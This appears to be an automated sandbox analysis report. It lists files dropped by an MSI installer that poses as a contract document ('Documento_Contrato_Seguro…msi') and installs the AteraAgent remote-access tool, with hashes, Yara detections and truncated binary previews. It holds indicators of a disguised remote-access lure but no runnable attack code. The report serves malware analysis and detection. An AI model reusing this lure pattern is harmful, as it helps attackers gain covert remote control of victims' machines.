                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI46E3.tmp-\System.Management.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61448
                                                                                                                                                                                                                                        Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                        MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                        SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                        SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                        SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI4B97.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):437339
                                                                                                                                                                                                                                        Entropy (8bit):6.648085253643198
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:zt3jOZy2KsGU6a4Ksht3jOZy2KsGU6a4Ksc:hzOE2Z34KGzOE2Z34Kj
                                                                                                                                                                                                                                        MD5:0222D6E8FC5B95702537E463ABD59A4D
                                                                                                                                                                                                                                        SHA1:A9C2396C9850B72C4CB52277D5C0E715831E48A4
                                                                                                                                                                                                                                        SHA-256:A375EF49CEA067411AF281D1EF9C10F280E9B7A49FC6C0DCDE040F2A81377720
                                                                                                                                                                                                                                        SHA-512:BCF1235560B47D98CEB26516E10941BDBF56045A2099709A4A6062B649C5C047D7A1A777D16DA3BDF7FD92A1A15CA2166353B022235F93A0E72071AC9BE464AD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI4B97.tmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@.e.Y.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent&.Documento_Contrato_Seguro_25105476.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........StopAteraServiceQuiet....J...StopAteraServiceQuiet.@A......M..MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................tex

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI4BA8.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI4C16.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI4D50.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):216496
                                                                                                                                                                                                                                        Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                        MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                        SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                        SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                        SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI6CA1.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI6CA1.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25600
                                                                                                                                                                                                                                        Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                        MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                        SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                        SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                        SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI6CA1.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI6CA1.tmp-\CustomAction.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1538
                                                                                                                                                                                                                                        Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                        MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                        SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                        SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                        SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI6CA1.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):184240
                                                                                                                                                                                                                                        Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                        MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                        SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                        SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                        SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI6CA1.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):711952
                                                                                                                                                                                                                                        Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                        MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                        SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                        SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                        SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ............`.....................................O......................../.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI6CA1.tmp-\System.Management.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61448
                                                                                                                                                                                                                                        Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                        MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                        SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                        SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                        SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bP.........." ..................... .........c. ....................... ......>.....`.....................................O.......\................>........................................................... ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H........"..`...........D....".......................................................................................0...............0.......................................................................0...............................................................................................................................................0...............0...................................................0...............0..............................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI77D8.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI77D8.tmp-\AlphaControlAgentInstallation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25600
                                                                                                                                                                                                                                        Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                        MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                        SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                        SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                        SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI77D8.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R..e.........." ..0..Z..........Bx... ........... ....................................`..................................w..O....................................v............................................... ............... ..H............text...HX... ...Z.................. ..`.rsrc................\..............@..@.reloc...............b..............@..B................$x......H........5...A............................................................(....r...p(.....s....o....,.r;..p(....(.... ....*r...p(.....*..0..M........(....r...p(.....s@...oA...,$(H...-..s'...r...pr;..p.o(.....o....r[..p(.....*....0..N........(....r...p(.....o....r...p..o....,..,..~.....o....,..*.s+...o,...r...p(.....*..(....r...p(.....s>...o?...rE..p(.....*..(....rm..p(.....s'...r...p..o(...r...p(.....*..(....r...p(.....s'...r...p..o(...r;..p(.....*..(....r]..p(.....s'...r...p

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI77D8.tmp-\CustomAction.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1538
                                                                                                                                                                                                                                        Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                        MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                        SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                        SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                        SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI77D8.tmp-\Microsoft.Deployment.WindowsInstaller.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):184240
                                                                                                                                                                                                                                        Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                        MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                        SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                        SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                        SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.].........." ..0...... ......z.... ........... ....................................@.................................(...O................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Installer\MSI77D8.tmp-\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):711952
                                                                                                                                                                                                                                        Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                        Encrypted:false
